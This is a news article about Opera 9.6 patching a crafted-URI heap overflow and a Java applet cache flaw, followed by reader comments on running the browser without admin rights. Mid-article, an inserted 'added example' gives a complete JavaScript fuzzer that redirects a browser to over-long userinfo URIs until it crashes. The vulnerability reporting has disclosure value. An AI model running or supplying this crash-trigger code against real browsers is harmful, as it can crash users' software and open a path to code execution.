Opera bitten by 'extremely severe' browser bug
Summary: Buried in the flurry of feature-related news surrounding the release of Opera 9.6 is the fact that the update fixes an "extremely severe" vulnerability that could expose Opera users to code execution attacks.
According to an Opera advisory, which is not mentioned anywhere in Opera's giddy press release, there's a patch out for an issue where specially crafted addresses could execute arbitrary code.
Here's how Opera describes the vulnerability, which was discovered and reported by Matasano's Chris Rohlf:
If a malicious page redirects Opera to a specially crafted address (URL), it can cause Opera to crash. Given sufficient address content, the crash could cause execution of code controlled by the attacking page.
Rohlf has more details on the Matasano Chargen blog:
In this case the vulnerability is based on a 'specially crafted URI' which of course can be triggered by any attacker controlled content. It is reproducible on both x86 Linux and Win XP SP2 and Vista.
This flaw was found using some rudimentary fuzzing, simple stuff really. I basically whipped up a few lines of JavaScript to create different URIs with incrementing string lengths (yes, I'm serious). And thanks to Immunity Debugger I was able to boil it down to a heap overflow in no time.
The offending URI was 'http://BBB*BBB:password@example.com'. This took minimal effort to find and underscores the importance of simple fuzzing test cases being built into your SDLC.
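The length-stepping URI fuzzer Rohlf describes, written out as an added example. This is not his code (the post does not reproduce it); the filler character, the step size, the storage key name, the use of Web Storage to survive the crash, and the memoryStore() helper are assumptions made for the illustration. The host, the "B" filler and the "password" userinfo follow the offending URI quoted above.

```javascript
// Added example: a crash-resumable, length-stepping URI fuzzer in the
// spirit of the one Rohlf describes. Not his code. The filler character,
// the step size, the storage key name and the memoryStore() helper are
// assumptions made for this illustration.

// Build one candidate: `len` filler characters in the userinfo part of the
// URL, in the shape of the offending 'http://BBB*BBB:password@example.com'.
function craftedUri(len, filler = "B", host = "example.com") {
  return "http://" + filler.repeat(len) + ":password@" + host + "/";
}

// Hand out the next case. A browser crash kills the page together with the
// script, so the length about to be tried is persisted *before* the redirect;
// after the browser is restarted and the page reloaded, the fuzzer resumes,
// and the last stored value is the length that crashed.
// `store` is anything with getItem/setItem: window.localStorage in a
// browser, memoryStore() below when run under Node.
function nextCase(store, opts) {
  const { start = 1, max = 65536, step = 64, key = "fuzz.len" } = opts || {};
  const prev = store.getItem(key);
  const len = prev === null ? start : Number(prev) + step;
  if (len > max) return null; // schedule exhausted without a crash
  store.setItem(key, String(len));
  return { len, uri: craftedUri(len) };
}

// Minimal in-memory stand-in for localStorage (same two-method interface),
// so the driver can be exercised outside a browser.
function memoryStore() {
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
  };
}

// Page entry point: when loaded in the target browser, try the next length
// by redirecting to the crafted address. Under Node there is no window, so
// this is skipped and the functions above can be driven directly.
if (typeof window !== "undefined" && window.localStorage) {
  const c = nextCase(window.localStorage, { start: 1, max: 65536, step: 64 });
  if (c) window.location.href = c.uri;
}
```

Persisting the length before the redirect is what makes a crash fuzzer practical: the page that triggers the bug never gets to report it. Once a crashing length is found, rerun with `start` set just below it and `step: 1` to pin down the exact boundary before reaching for the debugger.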
The Opera 9.6 update also fixes a second security bug reported by ex-Zero Day blogger Nate McFeters.
Opera rates this bug as "highly severe" and warns that Java applets can be used to read sensitive information:
Once a Java applet has been cached, if a page can predict the cache path for that applet, it can load the applet from the cache, causing it to run in the context of the local machine. This allows it to read other cache files on the computer or perform other normally more restrictive actions. These files could contain sensitive information, which could then be sent to the attacker.
Talkback
Thanks for the heads up
RE: Opera bitten by 'extremely severe' browser bug
Once again, don't run with administrative rights
You're not invulnerable by not having administrative rights, but you can mitigate the chances of having something like a keyboard logger on your system on account of running an unpatched browser.
Use the following tool:
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515
While the installer for RemoveAdmin sets up shortcuts for IE and Firefox only, just view either shortcut's properties to note that RemoveAdmin is really a general-purpose tool: you can set up a shortcut to launch Opera (or anything) and strip administrative rights when doing so, if you're running it on Windows XP, Windows 2000 or Windows Vista with UAC off.
-M
Bitten by Opera
Here's how to mitigate
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=lst-1&cdlPid=10835515
Create a shortcut on your desktop. Right click on it, select "Properties", go to the "Target" edit field and enter this
"c:\Program Files\RemoveAdmin\removeAdmin.exe" "C:\Program Files\Opera\Opera.exe"
That's ONE line, by the way, and don't forget the space between the second double quote and the third one. You're passing a command line argument to RemoveAdmin.
This will strip administrative rights off Opera and mitigate "arbitrary code execution".
You can change the icon to use Opera's icon. Just hit the "Change Icon" button. Windows will tell you removeAdmin.exe has no icons, that's ok. A popup allows you to specify some other .EXE to get icons from. Just enter the path to Opera, i.e.:
"C:\Program Files\Opera\Opera.exe"
Now you can pick the icon you want and your shortcut looks "polished". Call it "SecureOpera" or some such.
I use this tool to strip admin rights on any application that talks on the Internet (think condom).
-M
RE: Opera bitten by 'extremely severe' browser bug